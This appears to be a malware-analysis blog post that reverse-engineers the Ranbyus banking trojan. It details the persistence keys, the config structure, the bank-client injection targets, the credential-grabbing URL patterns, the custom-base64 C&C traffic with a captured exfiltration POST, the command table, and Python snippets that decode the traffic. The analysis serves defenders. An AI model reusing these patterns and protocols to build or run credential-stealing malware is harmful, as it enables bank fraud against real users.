0x16/7ton


Sunday, February 3, 2013

Trojan.Win32/Spy.Ranbyus

[General View]


Before you start reading my notes about this malware, read the other articles on it:
OK, now let's look at the bot's PE image. It has no import table, and most strings are encrypted.
After some reversing I worked out the API-calling convention used by this malware; look at this picture:

Every time the bot wants to call an API, it gets a pointer to the API-table buffer (in the picture that pointer is in register eax) and selects the desired function by index (in the picture the index is 0x13c).
To make analysis easier I've made this API table:
http://pastebin.com/g0MXyTnr
Here is also my IDAPython script for decrypting strings:
http://pastebin.com/F5MSe6BD

[Malware Installing]

Installation in the system is very trivial.
First of all, the malware tries to drop itself in one of two locations:
  • the system directory (GetSystemDirectory)
  • the temp directory (GetTempPath)
The dropped filenames are hardcoded in my sample:
  • ifkf_mfLEnWa_g.exe
  • BlvyLYGJKTTLK_gTzE.exe
Every new file gets its file times copied from kernel32.dll.
Here are the autorun registry keys that the bot uses:
  • Software\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
  • Software\Microsoft\Windows\CurrentVersion\Run
  • SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run (x64)
Name of the registry entry the bot uses for autorun: LmihNjzSczsUOFeQZJkVKCBFoz
The malware also stores its main config in the registry:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
under the name SysDebug32
The config is encrypted with the same algorithm that is used for the strings. Below you can see the structure of the config:
config total size == 0x312

BotConfig

Offset  Field name
0x0     char* host_url (C&C url)
0x64    char* botID (see description below)
0x96    bool block_bank_client_Work_1 (checked in java injection code)
0x97    bool block_bank_client_Work_2 (checked in java injection code)
0x98    bool block_bank_client_Work_3 (checked in java injection code)
0x99    bool block_bank_client_Work_4 (checked in cbmain.ex injection code)
0x9D    bool block_bank_client_Work_5 (checked in wclnt.exe, ip-client.exe, rclient.exe injection code)
0x9F    bool block_bank_client_Work_6 (checked in tiny.exe injection code)
0xAE    ??
0xB2    ??
0xBA    bool ProxyMode
0xBB    DWORD netAddr (proxy backconnect address)
0xBF    WORD port (proxy backconnect port)
0xC1    DWORD send_net_request (if set to 1, the bot sends Net_Request)
0xC5    ??
0xC9    DWORD rand
0xCD    DWORD rand
0xD1    FILETIME (bot up time: GetSystemTime -> SystemTimeToFileTime)
0xD9    ??
0xDB    ??
0x1A1   ??
0x30E   DWORD hash_config (used for checking config integrity)
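As an added example (my own Python, not code from the original post or from the bot), here is a parser that pulls the documented fields out of an already-decrypted SysDebug32 blob laid out as in the table above, which is what you want when pulling the C&C URL, bot ID and backconnect proxy out of an infected host's registry. The sample blob is constructed, the byte order of netAddr and port is an assumption, and the ?? fields and the hash algorithm are left untouched.

```python
import socket
import struct
from datetime import datetime, timedelta, timezone

CONFIG_SIZE = 0x312                                   # total size from the notes
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)

def _cstr(buf: bytes, off: int, maxlen: int) -> str:
    """NUL-terminated ASCII string starting at off, at most maxlen bytes."""
    return buf[off:off + maxlen].split(b"\x00", 1)[0].decode("ascii", "replace")
def filetime_to_datetime(ft: int) -> datetime:
    """FILETIME counts 100-ns intervals since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)
def datetime_to_filetime(dt: datetime) -> int:
    return ((dt - FILETIME_EPOCH) // timedelta(microseconds=1)) * 10

def parse_config(buf: bytes) -> dict:
    """Extract the documented fields from a decrypted SysDebug32 blob."""
    if len(buf) != CONFIG_SIZE:
        raise ValueError(f"expected {CONFIG_SIZE:#x} bytes, got {len(buf):#x}")
    return {
        "host_url": _cstr(buf, 0x00, 0x64),           # C&C url, runs up to botID
        "botID": _cstr(buf, 0x64, 0x96 - 0x64),       # runs up to the first flag
        "block_bank_client_Work": [bool(buf[o]) for o in (0x96, 0x97, 0x98, 0x99, 0x9D, 0x9F)],
        "ProxyMode": bool(buf[0xBA]),
        # assumption: netAddr is stored like an in_addr, port in host byte order
        "netAddr": socket.inet_ntoa(buf[0xBB:0xBF]),
        "port": struct.unpack_from("<H", buf, 0xBF)[0],
        "send_net_request": struct.unpack_from("<I", buf, 0xC1)[0],
        "rand": struct.unpack_from("<II", buf, 0xC9),
        "up_time": filetime_to_datetime(struct.unpack_from("<Q", buf, 0xD1)[0]),
        "hash_config": struct.unpack_from("<I", buf, 0x30E)[0],  # algorithm not known
    }

def build_sample_config() -> bytes:
    """Constructed blob for testing; values are placeholders, not a real config."""
    buf = bytearray(CONFIG_SIZE)
    url = b"http://cnc.example.invalid/releases/index.php"        # placeholder C&C host
    buf[0x00:len(url)] = url
    bot_id = b"0x16-779d52d376_33e2e8df_eb1735e7"                   # id seen in the capture
    buf[0x64:0x64 + len(bot_id)] = bot_id
    buf[0x96] = buf[0x97] = 1                                       # as command 0x3 would set them
    buf[0xBA] = 1                                                   # ProxyMode on
    buf[0xBB:0xBF] = bytes([10, 0, 0, 5])                           # constructed backconnect address
    struct.pack_into("<H", buf, 0xBF, 1080)
    struct.pack_into("<I", buf, 0xC1, 1)
    struct.pack_into("<Q", buf, 0xD1, datetime_to_filetime(datetime(2013, 2, 3, tzinfo=timezone.utc)))
    struct.pack_into("<I", buf, 0x30E, 0xDEADBEEF)
    return bytes(buf)
```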


[AVdetecting]

The bot enumerates processes and searches for AV vendors' software:
Kaspersky
ESET
AVG
Avira
Avast
Norton Antivirus
McAfee
Panda Antivirus
Comodo
DrWeb


After this check it sends a request to the C&C with request type AV_check (see the description below).
The bot is afraid of Kaspersky: if it finds an active Kaspersky process, it doesn't install in the system.
It also contains funny, useless code for killing the ESET GUI process (egui.exe).
That code just tries to open the process with PROCESS_TERMINATE access and terminate it. So this is a fucking disaster!


[InjectionCode]


The injection mechanism in this malware is just CreateRemoteThread.
The bot injects the main payload code into other processes:
  • on x86 systems it is svchost.exe
  • on x64 systems it is explorer.exe (it creates an explorer process and injects into it)

The bot has a hardcoded table consisting of a hash of the process name and the code-injection function.
In the sample I have, some process names in the table have no injection code. Probably this is customized when the bot is built.
Here I've gathered information about all the processes I found in the table:

Table of process names used in the malware for code injection
Company (Software) | URL | Image name | Injection code
BSS DBO Bank-Client | http://www.bssys.com/en/ | cbmain.ex | yes
Western Union | http://www.westernunion.com | translink.exe | yes
SberBank Bank-Client | http://www.sbrf.ru/en/ | wclnt.exe | yes
KazKom bank client | http://en.kkb.kz/ | rclient.exe | yes
WebMoney Transfer | http://www.wmtransfer.com/ | webmoney.exe | yes
Contact Money transfer system | http://www.contact-sys.com/eng/index.phtml | contactNG.exe | yes
CBS scrooge | http://eng.lime-systems.com/ | tiny.exe | yes
Unistream Money Transfer | http://intl.unistream.com | UniStream.exe | yes
Baltic Bank client | http://www.baltbank.ru/bc/ | BBClient.exe | yes
Mozilla Firefox | http://www.mozilla.org/en-US/ | firefox.exe | yes
Opera | http://www.opera.com/ | opera.exe | yes
Safari Browser | http://support.apple.com/kb/DL1531 | safari.exe | yes
Microsoft | http://windows.microsoft.com | iexplore.exe | yes
Oracle | http://www.oracle.com/index.html | java.exe, javaw.exe | yes
Putty SSH and telnet client | http://www.putty.org | putty.exe | yes
IntrustBank client | http://www.intrustbank.ru/ | clntw32.exe | no
Bank client | http://www.rpb.ru/doc/doku.php?id=goststart | intpro.exe | no
Credit bank of Moscow | http://english.mkb.ru/ | bc_loader.exe | no
B24 bank client | http://www.bank24.ru/ | iscc.exe | no
Inbank bank client | https://inbank.org/ | inbank-start-ff.exe | no
UralSib bank client | http://www.bankuralsib.ru/index.wbp | kb_cli.exe, kb_cli.ex | no
Unknown bank client | -/- | bankcl.exe | no
Unknown bank client | -/- | bk.exe | no
Microsoft | http://windows.microsoft.com | ntvdm.exe | no
Unknown bank client | -/- | startclient7.exe | no
Chelyabinsk bank client | http://www.chelinvest.ru/ | el_cli.ex | no
Unknown bank client | -/- | clbank.exe | no
Unknown bank client | -/- | oncbcli.exe | no
Unknown bank client | -/- | clmain.exe | no
RegionBank client | http://www.nomos-regiobank.ru/ | elbank.exe | no
BiKript bank client | http://www.s3bank.ru/corp/client-bank/index.phtml/ | ISClient.exe | no
SGB bank client | http://www.severgazbank.ru/ | sgbclient.exe | no
MFbank client | http://www.mfbank.ru/index.php | loadmain.exe | no
Unknown | -/- | selva_copy.exe | no
Unknown bank client | -/- | client7.exe | no
Unknown bank client | -/- | bclient.exe | no
Bank+ client | http://cbs.inversion.ru/ | cbsmain.exe | no

Here are examples of the payload for some processes:

Firefox, Iexplore, Opera, Safari payload
Delete all .ibank* files in systemroot/system32/java/ and the %USERPROFILE% directory
Hooked functions:
     wininet.dll
          HttpSendRequestW
          HttpSendRequestA
          HttpSendRequestExA
          InternetWriteFile
Firefox-specific hook:
      NSPR4.dll
           PR_Write
In the handler of the hooked function, it monitors access to online banks by template.
Here are the pattern strings it uses:
          https:\/\/ibank.prbb.ru
          https:\/\/ibank.alfabank.ru
          auth-attr-\d+-param1=.*&auth-attr-\d+-param2=.*
          \/servlets\/mbo
          \/servlets\/ibc
          /bsi.dll
          username=.*&password=.*

wclnt.exe, rclient.exe, ipclient.exe process payload
Hooked function:
       kernel32.dll
             CreateFile
In the handler of the hooked function, it captures key files and sends them to the C&C (see Send_key_file_request below):
        sign.key, master.key, UZ.DB3, GK.DB3


In general, the injected payloads look similar, and most of them are based on searching for windows, taking screenshots and grabbing information from windows. Here is a table of the windows searched for (some captions are in Russian; English glosses in parentheses):

Searched windows table
Window class | Window caption
SunAwtDialog | Вход в систему (Log in to the system), Синхронизация с Банком (Synchronization with the Bank)
SunAwtFrame | Вход в систему (Log in to the system), Welcome
javax.swing.JFrame | Вход в систему (Log in to the system), Welcome
MSAWT_Comp_Class | Вход в систему (Log in to the system), Welcome
PuTTY | -/-
TLoginWindow | Логин (Login)
TGetOper | Вход в систему (Log in to the system)
ThunderRT6FormDC | Western Union Translink
TfAuthNew | Tiny Client-Bank
WebMoney Keeper Classic | Идентификация пользователя (User identification)
UNIStreamR. Аутентификация. (Authentication.) | -/-

[NetworkActivity]

I identified three main parts of the bot's network activity:

- Sending information to and getting tasks from the C&C via HTTP GET/POST requests.
- Binding a port to accept incoming connections, enabling remote access to the smart card.
- Supporting a reverse (backconnect) SOCKS5 proxy.

The bot obfuscates its traffic with base64 using a custom alphabet:
"qBPTD5ZQcnLOjobYMd6JSEU1Ifv89G4RsXwe3yaKmFCAipurl0/t2VzxN+7khgHW="
So it is pretty easy to decode the traffic with a tool like this:
http://www.kahusecurity.com/2011/custom-base64-decoder/


A typical bot request looks like this:
------------------------------------------------------------------------------------
POST /releases/index.php HTTP/1.1
Content-Type: multipart/form-data, boundary=7DD02020A0D0000
User-Agent: gsa-crawler
Host: ___.__
Content-Length: 226
Connection: Keep-Alive
Cache-Control: no-cache

--7DD02020A0D0000
Content-Disposition: form-data; name="q"
vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq==
--7DD02020A0D0000
Content-Disposition: form-data; name="data"; filename="new_file"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary


J3gS6SffbwB1fUno8z+y46+y4ZS=

--7DD02020A0D0000--

------------------------------------------------------------------------------------
OK, let's parse this (the colors refer to the highlighting in the original screenshot of the request):
Blue: static values
Green: boundary, generated from GetSystemTime with the format string
%02X%02X%02X%02X%02X%04X
Purple: random user agent; see the table of all possible values below.
Orange: the request header message; here is an example of how it looks decoded:
id=0x16-779d52d376_33e2e8df_eb1735e7&session=2458654464&v=16779010&name=keno&mj=5&mi=1&pt=1&b=2600&dc=32
Format string:
id=%s&session=%u&v=%u&name=%s&mj=%u&mi=%u&pt=%u&b=%u&dc=%u
id = BotId, generated from the host name and two magic DWORDs computed by the main encryption algorithm (the key-table generation part), but using another alphabet:
      STORAGE_DEVICE_DESCRIPTOR serial number and product ID in the first round
      IP_ADAPTER_INFO.address in the second round
session = random value
v = bot version number (constant value)
name = bot build name (constant string)
mj = Windows MajorVersion
mi = Windows MinorVersion
pt = Windows ProductType
b = Windows BuildNumber
dc = processor architecture (x86/x64)

Aqua: request type; see the type table below
Red: the data of the request
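An added example (my own Python, not code from the original post) that decodes the custom alphabet described above by mapping it onto the standard one, and splits the decoded "q" header into its id/session/... fields. The two encoded strings are the "q" and "data" parts of the captured POST above; the encoder direction is included so a capture can be round-tripped or test traffic generated for a detection rule.

```python
import base64

# Alphabet recovered from the sample; the trailing "=" is the padding symbol.
CUSTOM_ALPHABET = "qBPTD5ZQcnLOjobYMd6JSEU1Ifv89G4RsXwe3yaKmFCAipurl0/t2VzxN+7khgHW="
STD_ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
TO_STD = str.maketrans(CUSTOM_ALPHABET, STD_ALPHABET)
TO_CUSTOM = str.maketrans(STD_ALPHABET, CUSTOM_ALPHABET)

def ranbyus_decode(text: str) -> bytes:
    """Map every custom symbol to its RFC 4648 counterpart, then decode as normal base64."""
    return base64.b64decode(text.translate(TO_STD))

def ranbyus_encode(data: bytes) -> str:
    """Inverse direction, e.g. to build test traffic for a detection rule."""
    return base64.b64encode(data).decode("ascii").translate(TO_CUSTOM)

def parse_query(decoded: bytes) -> dict:
    """Split a decoded 'q' field (id=...&session=...&...) into key/value pairs.
    Bare flags such as '&exception' get an empty value."""
    fields = {}
    for pair in decoded.decode("ascii", "replace").split("&"):
        key, _, value = pair.partition("=")
        fields[key] = value
    return fields

# The two encoded parts of the captured POST above (taken from the capture, not constructed).
Q_FIELD = ("vUMgjQs0ow2xoty3oJn3jt9z1tjtfJnybZda1zEwjJ9toUSxnKoy9xoF8zNgjesNbTs+oes+"
           "owfzYJDzot9+jTDlna+X8USgvzEu8/fpve2VnaVFYJDa9QMgj6fwYJczjTqafZjgjtcaGT2tje9xjq==")
DATA_PART = "J3gS6SffbwB1fUno8z+y46+y4ZS="   # decodes to NOTIFY: WebMoney.exe

if __name__ == "__main__":
    header = parse_query(ranbyus_decode(Q_FIELD))
    print(header["id"], header.get("name"), header.get("t"))
    print(ranbyus_decode(DATA_PART))
```

The "data" part decodes to the NOTIFY message of the Notify_request type described below, which identifies the process the payload was injected into.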

User agent table
Firefly/1.0 (compatible; Mozilla 4.0; MSIE 5.5)
FlashGet
Flexum/2.0
FreshDownload/x.xx
FavIconizer
DeepIndex
gsa-crawler
ContentSmartz
Mozilla/4.0 (compatible; MSIE 4.01; AOL 4.0; Windows 98)
Mozilla/4.0 (compatible; MSIE 5.0; Windows 95) TrueRobot; 1.5
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Maxthon)
Mozilla/5.0 (compatible; TridentSpider/3.1)
NationalDirectoryAddURL/1.0
NETCOMplete/x.xx
Nocilla/1.0
OliverPerry
OpenTextSiteCrawler/2.9.2
Opera/8.xx (Windows NT 5.1; U; en)
Opera/9.00 (Windows NT 5.1; U; de)
PHP/4.0.6
PHP/4.1.2
Popdexter/1.0
PureSight
RAYSPIDER/Nutch-0.9
Scooter-3.2.EX
SearchdayBot
ShablastBot 1.0
SiteXpert
TeamSoft WinInet Component
Toutatis x.x-x
URLBase/6.x
WebCorp/1.0
Y!J-SRD/1.0
Yeti
Zend_Http_Client 


Request type table
Request type name | Request parameters | Additional description
AV_check | &av=%d | Sends information about the running AV software
Check_token | &token=0 (token does not exist), &token=1 (token exists) |
Send_key_file_request | &cb=1 | Sends the bank client key file
Excep_request | &exception | Sent when an unhandled exception occurs in the bot
Alr_load_request | &lr=1 | Sent when mutex creation fails, i.e. an already running bot was detected
SendFile_Request | &file=1 (file not found), &file=2 (sends the file in a cab file) |
Comm_compl_request | &cmd=1 | Sent when a command received from the C&C has completed
Load_execute_request | &load=1 (success), &load=2 (failed) |
Net_Request | &net=1 | Sends the bot's network information
Key_request | &keys=1 | Sent when a .jks key is found
Screen_request | &screen=1 | Sent when a screenshot is made (the screenshot is in a cab file)
Notify_request | &t=%d (random) | Sent when injected into a process (the request data contains NOTIFY:%processname%)


The bot asks the C&C for tasks in a loop by sending requests.
Here is how a typical task request to the C&C and its answer look:

Below is the structure of a response from the C&C:
Task Message:
   DWORD count_param
   DWORD command
   BYTE  data[]


Command table
Command | Description
0x2 | Bot self-update
0x3 | Enable blocking of the bank client (sets block_bank_client_Work_1 and block_bank_client_Work_2 to true in the config)
0x4 | Disable blocking of the bank client (sets block_bank_client_Work_1 and block_bank_client_Work_2 to false in the config)
0x5 | Enable blocking of the bank client (sets block_bank_client_Work_3 to true in the config)
0x6 | Disable blocking of the bank client (sets block_bank_client_Work_3 to true in the config)
0x7 | Enable proxy mode (sets ProxyMode to true, sets netAddr and port in the config)
0x8 | Disable proxy mode (sets ProxyMode to false in the config)
0x9 | Get the list of files from all volumes (if data[] == NULL) or search for a file (filename mask in data[]); sends SendFile_Request
0x0A | Download a file from the URL given in data[] by GET request and execute it; sends Load_execute_request
0x0C | Search for key files (search mask *.jks); sends Key_request
0x0D | Kill the OS (delete files *.*, make a BSOD as in command 0x11)
0x0E | Bot self-deletion
0x0F | Send the bot's network information (Net_Request)
0x10 | Reboot the system
0x11 | BSOD the system (inject into a csrss thread and raise an exception in the injected thread)
0x12 | Set the value at offset 0xC5 to 1 (unknown)
0x13 | Set the value at offset 0xC5 to 0 (unknown)
0x14 | Update the C&C URL in the config (field host_url)
0x15 | Enable blocking of the bank client (sets block_bank_client_Work_4 to true in the config)
0x16 | Disable blocking of the bank client (sets block_bank_client_Work_4 to false in the config)
0x19 | Enable blocking of the bank client (sets block_bank_client_work_5 to true in the config)
0x1B | Load and launch a module
0x1C | Make a screenshot; sends Screen_request
0x20 | Disable blocking of the bank client (sets block_bank_client_work_5 to false in the config)


If the C&C does not respond during the task cycle, the bot can update its config to use the second C&C URL.

As I said, the bot binds a port (0x165a) to support remote control of the smart card.
In a simplified view, the commands give the ability to use these APIs:

0x0     SCardStatusA
0x1     SCardGetStatusChangeA
0x2     SCardDisconnect
0x3     SCardControl
0x4     SCardEstablishContext
0x5     SCardListReadersA
0x6     SCardConnectA
0x7     SCardBeginTransaction
0x8     SCardEndTransaction
0x9     SCardTransmit
0xa     SCardGetAttrib


Some additional information about the C&C directory structure (not all of it, of course):

/releases 
      avs.php
      base64.php
      commands.php
      config.php
      stat.php
      getrc.php

      /inc
          jabber.php
          thumbnail.php

      /modules
      /default
            /32
            /64     
      /other
      /_screenshots
              /1004 (example)
      /_files



[Conclusion]



I still haven't described a lot of this bot: the reverse proxy protocol, Java patching, etc. Maybe I forgot something, or some other shit.
But in the end my goal was just to show you a paradox:
bots with a simple architecture still work effectively and still steal money.

Thanks for reading ^_^
---------------------------
Cause and effect.